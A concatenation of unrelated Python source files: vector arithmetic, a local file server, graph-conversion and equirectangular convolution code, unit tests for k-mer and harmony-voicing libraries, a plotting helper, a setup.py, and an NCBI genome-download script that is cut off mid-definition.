assert isinstance(vector, Vector2D)
return -vector + self
def __isub__(self, vector):
assert isinstance(vector, Vector2D)
self.x -= vector.x
self.y -= vector.y
return self
def __mul__(self, value):
assert isinstance(value, (int, float))
return Vector2D(self.x * value, self.y * value)
def __rmul__(self, value):
assert isinstance(value, (int, float))
return self * value
def __truediv__(self, value):
assert isinstance(value, (int, float))
assert value != 0
return Vector2D(self.x / value, self.y / value)
def __floordiv__(self, value):
assert isinstance(value, (int, float))
assert value != 0
return Vector2D(self.x // value, self.y // value)
def __pow__(self, value):
assert isinstance(value, (int, float))
return Vector2D(self.x ** value, self.y ** value)
def dot(self, vector):
assert isinstance(vector, Vector2D)
return Vector2D(self.x * vector.x, self.y * vector.y)
def squared_magnitude(self):
return self.x ** 2 + self.y ** 2
def magnitude(self):
return np.sqrt(self.squared_magnitude())
def to_tuple(self):
return (self.x, self.y)
def __str__(self):
return f'({self.x} {self.y})'
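# A minimal usage sketch (not part of the original module) exercising the
# operator overloads defined above; the values are arbitrary examples.
if __name__ == '__main__':
    a = Vector2D(1, 2)
    b = Vector2D(3, 4)
    print(a + b)                 # (4 6)
    print(b - a)                 # (2 2)
    print(a.dot(b))              # (3 8) -- element-wise product, per dot() above
    print((b - a).magnitude())   # ~2.828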
|
py | b4111f8bf593ee02bf67fe8105938401f4c5d521 | #!/usr/bin/python
"""This script starts a web server that is listening on port 8000 on localhost.
It serves local files from the current working directory.
For example, if this directory contains the file "index.html", the file
is retrievable under this URL:
http://localhost:8000/index.html
"""
from BaseHTTPServer import HTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
port = 8000
handler = SimpleHTTPRequestHandler
httpd = HTTPServer(("127.0.0.1", port), handler)
httpd.serve_forever()
|
py | b4111fda8f207297c5fe69083359dcd136607294 |
def test_cli_template():
from snakeobjects import snakeUtils
|
py | b411200d704d9b031035775e933c0723e2793ff4 | """
Copyright (c) 2018 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import networkx as nx
import numpy as np
from mo.graph.graph import create_edge
from mo.middle.pattern_match import apply_pattern
from mo.ops.op import Op, PermuteAttrs
from mo.ops.reshape import Reshape
def mean_to_avgpool_action(graph: nx.MultiDiGraph, matches: dict):
if matches['axis'].value is None or matches['input'].shape is None:
return
dims = len(matches['input'].shape)
ones = np.ones(dims, dtype=np.int64)
mean = graph.node[matches['mean'].node]
mean['stride'] = np.array(ones)
# TODO: need to check axis with real layout
spatial_dims = np.array(matches['axis'].value)
mean['spatial_dims'] = spatial_dims
mean['pad'] = np.zeros((dims, 2), np.int64)
mean['pad_spatial_shape'] = np.array(mean['pad'][spatial_dims])
window = np.array(ones)
window[spatial_dims] = matches['input'].shape[spatial_dims]
mean['window'] = window
mean['TF_op'] = mean['op']
mean['op'] = 'AvgPool'
mean['pool_method'] = 'avg'
mean['rounding_type'] = 'ceil'
mean['exclude_pad'] = 'true'
mean['kernel_spatial'] = window[spatial_dims]
graph.remove_edge(matches['axis'].node, matches['mean'].node)
mean['permute_attrs'] = PermuteAttrs().update_attrs(attrs=[('pad', 'input:0'),
('stride', 'input:0'),
('window', 'input:0'),
('spatial_dims', 'input:0')])
if matches['mean'].keep_dims == False:
output = matches['mean'].out_node()
pool_node = matches['mean']
# Keep dims for AvgPool
shape = np.array(output.shape)
for idx in spatial_dims:
shape = np.insert(shape, idx, 1)
graph.remove_edge(pool_node.id, output.id)
# Create new data for pool with all dims
pool_data = Op.create_data_node(graph, pool_node, {'shape': np.array(shape)})
# Create and connect reshape node
reshape_op = Reshape(graph, {'dim': np.array(output.shape)})
reshape_node = reshape_op.create_node([pool_data], dict(name='Reshape_',
permute_attrs=PermuteAttrs().update_attrs(attrs=[('dim', 'output:0')])))
create_edge(reshape_node, output)
def mean_to_avgpool(graph: nx.MultiDiGraph):
"""
Translate Mean into average pooling with a kernel size equal to the reduced dimensions and no padding.
"""
apply_pattern(
graph,
nodes=[
('input', dict(kind='data')),
('axis', dict(kind='data')),
('mean', dict(kind='op', op='Mean'))],
edges=[
('input', 'mean', {'in': 0}),
('axis', 'mean', {'in': 1})],
action=mean_to_avgpool_action
)
return graph
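# Illustrative note (added sketch, not from the original source): for a data
# node of shape [N, C, H, W] reduced by Mean over axes [2, 3], the pass above
# rewrites the Mean node into an AvgPool with window [1, 1, H, W], stride 1 and
# zero padding, and appends a Reshape only when keep_dims was False.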
|
py | b411204c6c3c7c24ac0b31011661143aad01bfeb | import math
import torch
from torch import nn, Tensor
from torch.nn import init
from torch.nn.parameter import Parameter
from torch.nn.modules.utils import _pair
from torch.jit.annotations import Optional, Tuple
from torchvision.ops.deform_conv import deform_conv2d
def equi_conv2d(input, weight, bias=None, stride=(1, 1), padding=(0, 0), dilation=(1, 1)):
# type: (Tensor, Tensor, Optional[Tensor], Tuple[int, int], Tuple[int, int], Tuple[int, int]) -> Tensor
"""
Performs Equirectangular Convolution, described in Corners for Layout : End to End Layout Recovery from 360 Images
Arguments:
input (Tensor[batch_size, in_channels, in_height, in_width]): input tensor
weight (Tensor[out_channels, in_channels // groups, kernel_height, kernel_width]):
convolution weights, split into groups of size (in_channels // groups)
bias (Tensor[out_channels]): optional bias of shape (out_channels,). Default: None
stride (int or Tuple[int, int]): distance between convolution centers. Default: 1
padding (int or Tuple[int, int]): height/width of padding of zeroes around
each image. Default: 0
dilation (int or Tuple[int, int]): the spacing between kernel elements. Default: 1
Returns:
output (Tensor[batch_sz, out_channels, out_h, out_w]): result of convolution
Examples::
>>> input = torch.rand(1, 3, 10, 10)
>>> kh, kw = 3, 3
>>> weight = torch.rand(5, 3, kh, kw)
>>> # the distortion-aware offsets are computed internally, so only the
>>> # input and the weights are needed. For an input of 10, stride of 1
>>> # and kernel size of 3, without padding, the output size is 8
>>> out = equi_conv2d(input, weight)
>>> print(out.shape)
>>> # returns
>>> torch.Size([1, 5, 8, 8])
"""
weight = weight.to(input.device)
out_channels = weight.shape[0]
if bias is None:
bias = torch.zeros(out_channels, device=input.device, dtype=input.dtype)
else:
bias = bias.to(input.device)
stride_h, stride_w = _pair(stride)
pad_h, pad_w = _pair(padding)
dil_h, dil_w = _pair(dilation)
weights_h, weights_w = weight.shape[-2:]
bs, n_in_channels, in_h, in_w = input.shape
pano_W = int((in_w + 2*pad_w - dil_w*(weights_w-1)-1)//stride_w + 1)
pano_H = int((in_h + 2*pad_h - dil_h*(weights_h-1)-1)//stride_h + 1)
def rotation_matrix(axis, theta):
""" code by cfernandez and jmfacil """
"""
Return the rotation matrix associated with counterclockwise rotation about
the given axis by theta radians.
"""
axis = torch.as_tensor(axis, device='cpu', dtype=input.dtype)
axis = axis / math.sqrt(torch.dot(axis, axis))
a = math.cos(theta / 2.0)
b, c, d = -axis * math.sin(theta / 2.0)
aa, bb, cc, dd = a * a, b * b, c * c, d * d
bc, ad, ac, ab, bd, cd = b * c, a * d, a * c, a * b, b * d, c * d
ROT = torch.tensor([[aa + bb - cc - dd, 2 * (bc + ad), 2 * (bd - ac)],
[2 * (bc - ad), aa + cc - bb - dd, 2 * (cd + ab)],
[2 * (bd + ac), 2 * (cd - ab), aa + dd - bb - cc]], device='cpu', dtype=input.dtype)
return ROT
def equi_coord(pano_W,pano_H,k_W,k_H,u,v):
""" code by cfernandez and jmfacil """
fov_w = k_W * math.radians(360./float(pano_W))
focal = (float(k_W)/2) / math.tan(fov_w/2)
c_x = 0
c_y = 0
u_r, v_r = u, v
u_r, v_r = u_r-float(pano_W)/2.,v_r-float(pano_H)/2.
phi, theta = u_r/(pano_W) * (math.pi) *2, -v_r/(pano_H) * (math.pi)
ROT = rotation_matrix((0,1,0),phi)
ROT = torch.matmul(ROT,rotation_matrix((1,0,0),theta))#np.eye(3)
h_range = torch.tensor(range(k_H), device='cpu', dtype=input.dtype)
w_range = torch.tensor(range(k_W), device='cpu', dtype=input.dtype)
w_ones = (torch.ones(k_W, device='cpu', dtype=input.dtype))
h_ones = (torch.ones(k_H, device='cpu', dtype=input.dtype))
h_grid = torch.matmul(torch.unsqueeze(h_range,-1),torch.unsqueeze(w_ones,0))+0.5-float(k_H)/2
w_grid = torch.matmul(torch.unsqueeze(h_ones,-1),torch.unsqueeze(w_range,0))+0.5-float(k_W)/2
K = torch.tensor([[focal,0,c_x],[0,focal,c_y],[0.,0.,1.]], device='cpu', dtype=input.dtype)
inv_K = torch.inverse(K)
rays = torch.stack([w_grid,h_grid,torch.ones(h_grid.shape, device='cpu', dtype=input.dtype)],0)
rays = torch.matmul(inv_K,rays.reshape(3,k_H*k_W))
rays /= torch.norm(rays,dim=0,keepdim=True)
rays = torch.matmul(ROT,rays)
rays = rays.reshape(3,k_H,k_W)
phi = torch.atan2(rays[0,...],rays[2,...])
theta = torch.asin(torch.clamp(rays[1,...],-1,1))
x = (pano_W)/(2.*math.pi)*phi +float(pano_W)/2.
y = (pano_H)/(math.pi)*theta +float(pano_H)/2.
roi_y = h_grid+v_r +float(pano_H)/2.
roi_x = w_grid+u_r +float(pano_W)/2.
new_roi_y = (y)
new_roi_x = (x)
offsets_x = (new_roi_x - roi_x)
offsets_y = (new_roi_y - roi_y)
return offsets_x, offsets_y
def distortion_aware_map(pano_W, pano_H, k_W, k_H, s_width = 1, s_height = 1,bs = 16):
""" code by cfernandez and jmfacil """
#n=1
offset = torch.zeros(2*k_H*k_W,pano_H,pano_W, device='cpu', dtype=input.dtype)
for v in range(0, pano_H, s_height):
for u in range(0, pano_W, s_width):
offsets_x, offsets_y = equi_coord(pano_W,pano_H,k_W,k_H,u,v)
offsets = torch.cat((torch.unsqueeze(offsets_y,-1),torch.unsqueeze(offsets_x,-1)),dim=-1)
total_offsets = offsets.flatten()
offset[:,v,u] = total_offsets
offset = torch.unsqueeze(offset, 0)
offset = torch.cat([offset for _ in range(bs)],dim=0)
offset.requires_grad_(False)
#print(offset.shape)
#print(offset)
return offset
offset = distortion_aware_map(pano_W, pano_H, weights_w, weights_h,
s_width = stride_w, s_height = stride_h, bs = bs)
offset = offset.to(input.device)
return deform_conv2d(input, offset, weight, bias=bias, stride=stride, padding=padding, dilation=dilation)
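# Usage sketch for the module wrapper defined below (shapes are illustrative
# assumptions, not taken from the original source):
#   layer = EquiConv2d(in_channels=3, out_channels=5, kernel_size=3)
#   out = layer(torch.rand(1, 3, 10, 10))   # -> torch.Size([1, 5, 8, 8])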
class EquiConv2d(nn.Module):
"""
See equi_conv2d
"""
def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0,
dilation=1, groups=1, bias=True):
super(EquiConv2d, self).__init__()
if in_channels % groups != 0:
raise ValueError('in_channels must be divisible by groups')
if out_channels % groups != 0:
raise ValueError('out_channels must be divisible by groups')
self.in_channels = in_channels
self.out_channels = out_channels
self.kernel_size = _pair(kernel_size)
self.stride = _pair(stride)
self.padding = _pair(padding)
self.dilation = _pair(dilation)
self.groups = groups
self.weight = Parameter(torch.empty(out_channels, in_channels // groups,
self.kernel_size[0], self.kernel_size[1]))
if bias:
self.bias = Parameter(torch.empty(out_channels))
else:
self.register_parameter('bias', None)
self.reset_parameters()
def reset_parameters(self):
init.kaiming_uniform_(self.weight, a=math.sqrt(5))
if self.bias is not None:
fan_in, _ = init._calculate_fan_in_and_fan_out(self.weight)
bound = 1 / math.sqrt(fan_in)
init.uniform_(self.bias, -bound, bound)
def forward(self, input):
"""
Arguments:
input (Tensor[batch_size, in_channels, in_height, in_width]): input tensor
"""
return equi_conv2d(input, self.weight, self.bias, stride=self.stride,
padding=self.padding, dilation=self.dilation)
def __repr__(self):
s = self.__class__.__name__ + '('
s += '{in_channels}'
s += ', {out_channels}'
s += ', kernel_size={kernel_size}'
s += ', stride={stride}'
s += ', padding={padding}' if self.padding != (0, 0) else ''
s += ', dilation={dilation}' if self.dilation != (1, 1) else ''
s += ', groups={groups}' if self.groups != 1 else ''
s += ', bias=False' if self.bias is None else ''
s += ')'
return s.format(**self.__dict__) |
py | b411205aa93fef697abd86748b1b7c6325ce214c | # This source code is part of the Biotite package and is distributed
# under the 3-Clause BSD License. Please see 'LICENSE.rst' for further
# information.
import numpy as np
import pytest
import biotite.sequence as seq
import biotite.sequence.align as align
K = 3
@pytest.fixture
def kmer_alphabet():
return align.KmerAlphabet(seq.ProteinSequence.alphabet, K)
@pytest.fixture
def spaced_kmer_alphabet():
return align.KmerAlphabet(seq.ProteinSequence.alphabet, K, spacing=[0,1,2])
np.random.seed(0)
N = 10
L = 30
@pytest.mark.parametrize(
"ref_split_kmer_code",
# Test for single instances as input
list(np.random.randint(len(seq.ProteinSequence.alphabet), size=(N, K))) +
# Test for multiple instances as input
list(np.random.randint(len(seq.ProteinSequence.alphabet), size=(N, L, K)))
)
def test_fuse_and_split(kmer_alphabet, ref_split_kmer_code):
"""
Check if :meth:`fuse()` and its reverse counterpart :meth:`split()`
work properly by using them back and forth on random input.
"""
fused = kmer_alphabet.fuse(ref_split_kmer_code)
test_split_kmer_code = kmer_alphabet.split(fused)
assert test_split_kmer_code.tolist() == ref_split_kmer_code.tolist()
np.random.seed(0)
N = 10
@pytest.mark.parametrize(
"split_kmer_code",
np.random.randint(len(seq.ProteinSequence.alphabet), size=(N, K))
)
def test_encode_and_decode(kmer_alphabet, split_kmer_code):
"""
Check if :meth:`encode()` and its reverse counterpart
:meth:`decode()` work properly by using them back and forth on
random input.
"""
alph = seq.ProteinSequence.alphabet
ref_kmer_symbol = alph.decode_multiple(split_kmer_code)
kmer_code = kmer_alphabet.encode(ref_kmer_symbol)
test_kmer_symbol = kmer_alphabet.decode(kmer_code)
assert test_kmer_symbol.tolist() == ref_kmer_symbol.tolist()
def test_create_continuous_kmers(kmer_alphabet):
"""
Test :meth:`create_kmers()` against repetitive use of
:meth:`fuse()`, which rely on two different implementations.
The input sequence code is randomly created.
"""
np.random.seed(0)
LENGTH = 100
seq_code = np.random.randint(
len(seq.ProteinSequence.alphabet), size=LENGTH, dtype=np.uint8
)
ref_kmers = [
kmer_alphabet.fuse(seq_code[i : i + kmer_alphabet.k])
for i in range(len(seq_code) - kmer_alphabet.k + 1)
]
test_kmers = kmer_alphabet.create_kmers(seq_code)
assert test_kmers.tolist() == ref_kmers
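# Illustrative note (assumption, mirroring the reference loop above): for k = 3
# and a sequence code [c0, c1, c2, c3], create_kmers() returns the fused codes
# of the sliding windows (c0, c1, c2) and (c1, c2, c3).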
N = 50
@pytest.mark.parametrize("seed", range(N))
def test_create_spaced_kmers(kmer_alphabet, spaced_kmer_alphabet, seed):
"""
Test :meth:`create_kmers()` for creating spaced *k-mers*.
Compare results from random sequences to corresponding results from
:meth:`create_kmers()` without spacing, by using a spacing model
that is equivalent to non-spaced *k-mers*.
"""
MIN_LENGTH = 10
MAX_LENGTH = 1000
np.random.seed(seed)
sequence = seq.ProteinSequence()
sequence.code = np.random.randint(
len(sequence.alphabet),
size=np.random.randint(MIN_LENGTH, MAX_LENGTH)
)
ref_kmers = kmer_alphabet.create_kmers(sequence.code)
test_kmers = spaced_kmer_alphabet.create_kmers(sequence.code)
assert len(test_kmers) == len(ref_kmers)
assert test_kmers.tolist() == ref_kmers.tolist()
def test_invalid_spacing():
"""
Check if expected exceptions are raised if an invalid spacing is
given.
"""
alphabet = seq.ProteinSequence.alphabet
with pytest.raises(ValueError):
# Not enough informative positions for given k
align.KmerAlphabet(alphabet, 5, spacing=[0, 1, 3, 4])
with pytest.raises(ValueError):
# Duplicate positions
align.KmerAlphabet(alphabet, 5, spacing=[0, 1, 1, 3, 4])
with pytest.raises(ValueError):
# Negative values
align.KmerAlphabet(alphabet, 5, spacing=[-1, 1, 2, 3, 4]) |
py | b411209e81065be5435837705481f676591b20b7 | import unittest
from music21.converter import parseData as m21ParseData
from romanyh.voicing import solveProgression
from romanyh.voicing import getChordFromPitches
from romanyh.voicing import getKeyFromString
from romanyh.voicing import getPitchFromString
from romanyh.voicing import getLeadingTone
from romanyh.voicing import getVerticalIntervalsFromPitches
from romanyh.voicing import getInterval
from romanyh.voicing import isTriad
from romanyh.voicing import voiceChord
from romanyh.voicing import progressionCost
from romanyh.voicing import chordCost
trivial = """
Composer: Néstor Nápoles López
Title: Changing keys
Time signature: 4/4
m1 b1 C: I b2 I
m2 I b2 I
m3 I
"""
basic = """
Composer: Néstor Nápoles López
Title: Basic
Time signature: 4/4
m1 b1 C: I b3 IV
m2 Cad64 b3 V
m3 I
"""
changingKeys = """
Composer: Néstor Nápoles López
Title: Changing keys
Time signature: 3/4
m1 b1 C: I c: b3 I
m2 C: V c: b3 V
m3 C: I c: b3 I
"""
def cleanupCache():
getChordFromPitches.cache_clear()
getKeyFromString.cache_clear()
getPitchFromString.cache_clear()
getLeadingTone.cache_clear()
getVerticalIntervalsFromPitches.cache_clear()
getInterval.cache_clear()
isTriad.cache_clear()
voiceChord.cache_clear()
progressionCost.cache_clear()
chordCost.cache_clear()
def getCaches():
return (
("getChordFromPitches", getChordFromPitches.cache_info()),
("getKeyFromString", getKeyFromString.cache_info()),
("getPitchFromString", getPitchFromString.cache_info()),
("getLeadingTone", getLeadingTone.cache_info()),
(
"getVerticalIntervalsFromPitches",
getVerticalIntervalsFromPitches.cache_info(),
),
("getInterval", getInterval.cache_info()),
("isTriad", isTriad.cache_info()),
("voiceChord", voiceChord.cache_info()),
("progressionCost", progressionCost.cache_info()),
("chordCost", chordCost.cache_info()),
)
def romanNumeralsToPitches(romanNumerals):
pitchTuples = []
for rn in romanNumerals:
pitchTuples.append(tuple(p.nameWithOctave for p in rn.pitches))
return pitchTuples
class TestTrivialExample(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.testFile = trivial
cls.voicingsLengthGT = (43, 43, 43, 43, 43)
cls.cachesGT = (
{"hits": 3698, "misses": 46}, # getChordFromPitches
{"hits": 1849, "misses": 1}, # getKeyFromString
{"hits": 449, "misses": 10}, # getPitchFromString
{"hits": 1848, "misses": 1}, # getLeadingTone
{"hits": 3655, "misses": 43}, # getVerticalIntervalsFromPitches
{"hits": 7799, "misses": 71}, # getInterval
{"hits": 42, "misses": 2}, # isTriad
{"hits": 4, "misses": 1}, # voiceChord
{"hits": 5547, "misses": 1849}, # progressionCost
{"hits": 172, "misses": 43}, # chordCost
)
def setUp(self):
self.s = m21ParseData(self.testFile, format="romantext")
self.romanNumerals = [
rn for rn in self.s.flat.getElementsByClass("RomanNumeral")
]
def test_voicing_length(self):
pitchTuples = romanNumeralsToPitches(self.romanNumerals)
for i, pitches in enumerate(pitchTuples):
voicings = voiceChord(pitches, allowedUnisons=1)
voicingLengthGT = self.voicingsLengthGT[i]
with self.subTest(msg=str(pitches)):
self.assertEqual(len(voicings), voicingLengthGT)
def test_cache_info(self):
solveProgression(self.romanNumerals, allowedUnisons=1)
caches = getCaches()
for i, cache in enumerate(caches):
cacheName, cacheInfo = cache
cacheGT = self.cachesGT[i]
with self.subTest(msg=cacheName):
self.assertEqual(cacheInfo.hits, cacheGT["hits"])
self.assertEqual(cacheInfo.misses, cacheGT["misses"])
def tearDown(self):
cleanupCache()
class TestBasicExample(TestTrivialExample):
@classmethod
def setUpClass(cls):
cls.testFile = basic
cls.voicingsLengthGT = (43, 46, 28, 46, 43)
cls.cachesGT = (
{"hits": 13064, "misses": 173}, # getChordFromPitches
{"hits": 6532, "misses": 1}, # getKeyFromString
{"hits": 1780, "misses": 24}, # getPitchFromString
{"hits": 6531, "misses": 1}, # getLeadingTone
{"hits": 12901, "misses": 163}, # getVerticalIntervalsFromPitches
{"hits": 27617, "misses": 266}, # getInterval
{"hits": 161, "misses": 6}, # isTriad
{"hits": 1, "misses": 4}, # voiceChord
{"hits": 0, "misses": 6532}, # progressionCost
{"hits": 43, "misses": 163}, # chordCost
)
class TestChangingKeysExample(TestTrivialExample):
@classmethod
def setUpClass(cls):
cls.testFile = changingKeys
cls.voicingsLengthGT = (43, 43, 46, 46, 43, 43)
cls.cachesGT = (
{"hits": 15842, "misses": 95}, # getChordFromPitches
{"hits": 7921, "misses": 2}, # getKeyFromString
{"hits": 1033, "misses": 17}, # getPitchFromString
{"hits": 7919, "misses": 2}, # getLeadingTone
{"hits": 15753, "misses": 89}, # getVerticalIntervalsFromPitches
{"hits": 32469, "misses": 178}, # getInterval
{"hits": 87, "misses": 4}, # isTriad
{"hits": 4, "misses": 2}, # voiceChord
{"hits": 1849, "misses": 7921}, # progressionCost
{"hits": 175, "misses": 89}, # chordCost
)
if __name__ == "__main__":
unittest.main()
|
py | b4112158eb43a79e8bcf4d01e4f5273daf9d3992 | from typing import Iterable
import matplotlib.axes
import matplotlib.pyplot as plt
import pandas as pd
import seaborn as sns
def rename_teachers(data: pd.DataFrame):
dic = {
"leitner": "Leitner",
"forward": "Conservative\nsampling",
"threshold": "Myopic",
}
for k, v in dic.items():
data["teacher"] = data["teacher"].replace([k], v)
return data
def boxplot_n_learnt(data: pd.DataFrame,
ax: matplotlib.axes.Axes = None,
ylim: Iterable = None,
x_label: str = "Teacher",
y_label: str = "Learned",
dot_size: int = 3,
dot_alpha: float = 0.7):
if ax is None:
fig, ax = plt.subplots()
data = rename_teachers(data)
data = data.rename(columns={
"n_learnt": y_label,
"teacher": x_label
})
order = ["Leitner", "Myopic", "Conservative\nsampling"]
colors = ["C0", "C1", "C2"]
sns.boxplot(x=x_label, y=y_label, data=data, ax=ax,
palette=colors, order=order,
showfliers=False)
sns.stripplot(x=x_label, y=y_label, data=data, s=dot_size,
color="0.25", alpha=dot_alpha, ax=ax, order=order)
ax.set_xticklabels(ax.get_xmajorticklabels(), fontsize=13)
if ylim is not None:
ax.set_ylim(*ylim)
ax.set_xlabel("")
|
py | b4112169b0d6ce81a8407be4c68918127d15f038 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup
import re
import os
import sys
def get_version(package):
"""
Return package version as listed in `__version__` in `init.py`.
"""
init_py = open(os.path.join(package, '__init__.py')).read()
return re.search("__version__ = ['\"]([^'\"]+)['\"]", init_py).group(1)
def get_packages(package):
"""
Return root package and all sub-packages.
"""
return [dirpath
for dirpath, dirnames, filenames in os.walk(package)
if os.path.exists(os.path.join(dirpath, '__init__.py'))]
def get_package_data(package):
"""
Return all files under the root package, that are not in a
package themselves.
"""
walk = [(dirpath.replace(package + os.sep, '', 1), filenames)
for dirpath, dirnames, filenames in os.walk(package)
if not os.path.exists(os.path.join(dirpath, '__init__.py'))]
filepaths = []
for base, filenames in walk:
filepaths.extend([os.path.join(base, filename)
for filename in filenames])
return {package: filepaths}
version = get_version('openapi_codec')
if sys.argv[-1] == 'publish':
os.system("python setup.py sdist upload")
print("You probably want to also tag the version now:")
print(" git tag -a %s -m 'version %s'" % (version, version))
print(" git push --tags")
sys.exit()
setup(
name='openapi-codec',
version=version,
url='http://github.com/core-api/python-openapi-codec/',
license='BSD',
description='An OpenAPI codec for Core API.',
author='Tom Christie',
author_email='[email protected]',
packages=get_packages('openapi_codec'),
package_data=get_package_data('openapi_codec'),
install_requires=['coreapi>=2.2.0'],
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
],
entry_points={
'coreapi.codecs': [
'openapi=openapi_codec:OpenAPICodec'
]
}
)
|
py | b41121a9c65cde3d49b0b86e84f0fd12c14d283b | #!/usr/bin/env python3
"""
script for downloading genomes from NCBI
"""
# python modules
import os
import sys
import argparse
import pandas as pd
from tqdm import tqdm
from subprocess import Popen
from glob import glob as glob
from multiprocessing import Pool
from subprocess import Popen, PIPE
def calcMD5(path, md5):
"""
calc MD5 based on path
"""
# check that file exists
if os.path.exists(path) is False:
yield False
else:
command = [md5, path]
p = Popen(command, stdout = PIPE)
for line in p.communicate()[0].splitlines():
line = line.decode('ascii').strip().split()
# check if `md5` output
if line[0] == 'MD5':
yield line[-1]
# else assume md5sum output
else:
yield line[0]
p.wait()
yield False
def md5check(f, ftp, md5, md5p, exclude):
"""
* comfirm that downloaded files match md5 checksum on server
* if md5 is False, only check path for the download
"""
files = glob(f)
# if no md5 file is specified: download files if path does not exist
if md5 is False:
if len(files) == 0:
return False
print('## already downloaded:', f)
return True
# get md5s from server
## path to md5 file on ftp server
md5 = '%s/%s' % (ftp.rsplit('/', 1)[0], md5)
## read md5 table from server
try:
md5 = pd.read_csv(md5, delim_whitespace = True, names = ['ftp md5', 'file'])
except:
return False
## filter for md5 files that match file type
t = f.split('*')[1]
md5 = md5[md5['file'].str.contains(t)]
## remove preceding characters from file paths
md5['file'] = [i.replace('./', '') for i in md5['file']]
## exclude md5s for sub directories
md5 = md5[~md5['file'].str.contains('/')]
## exclude files
md5 = md5[~md5['file'].str.contains(exclude.replace('*', ''))]
# get local md5s
md5['local md5'] = [[j for j in calcMD5(i, md5p)][0] for i in md5['file']]
# return false if md5s do not match
for i, File in md5.iterrows():
if File['ftp md5'] != File['local md5']:
try:
os.remove(File['file'])
return False
except:
return False
print('## already downloaded:', f)
return True
def wget(ftp, f = False, exclude = False, name = False,
md5 = False, md5p = 'md5sum', tries = 10):
"""
download files with wget
"""
# file name
if f is False:
f = ftp.rsplit('/', 1)[-1]
# download the file if it does not already exist
# check md5s on server (optional)
t = 0
while md5check(f, ftp, md5, md5p, exclude) is not True:
t += 1
if name is not False:
print('# downloading:', name, f)
if exclude is False:
command = 'wget -q --random-wait %s' % (ftp)
else:
command = 'wget -q --random-wait -R %s %s' % (exclude, ftp)
p = Popen(command, shell = True)
p.communicate()
if t >= tries:
print('not downloaded:', name, f)
return [f, False]
return [f, True]
def check(line, queries):
"""
check that at least one of the
queries appears in the given line
"""
line = line.strip()
spLine = line.replace('.', ' ').split()
matches = set(spLine).intersection(queries)
if len(matches) > 0:
return matches, line.split('\t')
return matches, False
def entrez(db, acc):
"""
search entrez using specified database
and accession
"""
c1 = ['esearch', '-db', db, '-query', acc]
c2 = ['efetch', '-db', 'BioSample', '-format', 'docsum']
p1 = Popen(c1, stdout = PIPE, stderr = PIPE)
p2 = Popen(c2, stdin = p1.stdout, stdout = PIPE, stderr = PIPE)
return p2.communicate()
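# Equivalent shell pipeline (sketch of what the two Popen calls above build):
#   esearch -db <db> -query <acc> | efetch -db BioSample -format docsum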
def searchAccession(acc):
"""
attempt to use NCBI Entrez to get
BioSample ID
"""
# try genbank file
# genome database
out, error = entrez('genome', acc)
for line in out.splitlines():
line = line.decode('ascii').strip()
if 'Assembly_Accession' in line or 'BioSample' in line:
newAcc = line.split('>')[1].split('<')[0].split('.')[0].split(',')[0]
if len(newAcc) > 0:
return (True, acc, newAcc)
# nucleotide database
out, error = entrez('nucleotide', acc)
for line in out.splitlines():
line = line.decode('ascii').strip()
if 'Assembly_Accession' in line or 'BioSample' in line:
newAcc = line.split('>')[1].split('<')[0].split('.')[0].split(',')[0]
if len(newAcc) > 0:
return (True, acc, newAcc)
# assembly database
out, error = entrez('assembly', acc)
for line in out.splitlines():
line = line.decode('ascii').strip()
if 'Assembly_Accession' in line or 'BioSample' in line:
newAcc = line.split('>')[1].split('<')[0].split('.')[0].split(',')[0]
if len(newAcc) > 0:
return (True, acc, newAcc)
for error in error.splitlines():
error = error.decode('ascii').strip()
if '500 Can' in error:
return (False, acc, 'no network')
return (False, acc, 'efetch failed')
def getFTPs(accessions, ftp, search, exclude, convert = False, threads = 1, attempt = 1,
max_attempts = 2):
"""
download genome info from NCBI
"""
info = wget(ftp)[0]
allMatches = []
for genome in open(info, encoding = 'utf8'):
genome = str(genome)
matches, genomeInfo = check(genome, accessions)
if genomeInfo is not False:
f = genomeInfo[0] + search
Gftp = genomeInfo[19]
Gftp = Gftp + '/' + search
allMatches.extend(matches)
yield [Gftp, f, exclude, matches]
# print accessions that could not be matched
# and whether or not they could be converted (optional)
newAccs = []
missing = accessions.difference(set(allMatches))
if convert is True:
pool = Pool(threads)
pool = pool.imap_unordered(searchAccession, missing)
for newAcc in tqdm(pool, total = len(missing)):
status, accession, newAcc = newAcc
if status is True:
newAccs.append(newAcc)
print('not found:', accession, '->', newAcc)
else:
for accession in missing:
print('not found:', accession)
# re-try after converting accessions (optional)
if len(newAccs) > 0 and attempt <= max_attempts:
print('convert accession attempt', attempt)
attempt += 1
for hit in getFTPs(set(newAccs), ftp, search, exclude, convert,
threads = 1, attempt = attempt):
yield hit
def wgetGenome(pars, md5 = 'md5checksums.txt'):
"""
"""
ftp, f, exclude, matches, md5p = pars
name = ';'.join(list(matches))
return wget(ftp, f, exclude, name, md5 = md5, md5p = md5p)
def download(args):
"""
download genomes from NCBI
"""
accessions, infoFTP = set(args['g']), args['i']
search, exclude, md5p = args['s'], args['e'], args['m']
FTPs = getFTPs(accessions, infoFTP, search, exclude, threads = args['t'],
convert = args['convert'])
FTPs = [ftp + [md5p] for ftp in FTPs]
if args['test'] is True:
for genome in FTPs:
print('found:', ';'.join(genome[-1]), genome[0])
return FTPs
pool = Pool(args['t'])
pool = pool.imap_unordered(wgetGenome, FTPs)
files = []
for f in tqdm(pool, total = len(accessions)):
files.append(f)
return files
if __name__ == '__main__':
ftp = 'ftp://ftp.ncbi.nih.gov/genomes/genbank/assembly_summary_genbank.txt'
parser = argparse.ArgumentParser(description='# download genomes from NCBI')
parser.add_argument(\
'-g', nargs = '*', action = 'store',
required = True, help = 'list of genome accession numbers (- for stdin)')
parser.add_argument(\
'-s', default = '*.fna.gz',
required = False, help = 'search term for download (default = "*.fna.gz")')
parser.add_argument(\
'-e', default = '*from_genomic*',
required = False,
help = 'search exclusion term, or False (default = "*from_genomic*")')
parser.add_argument(\
'-i', default = ftp,
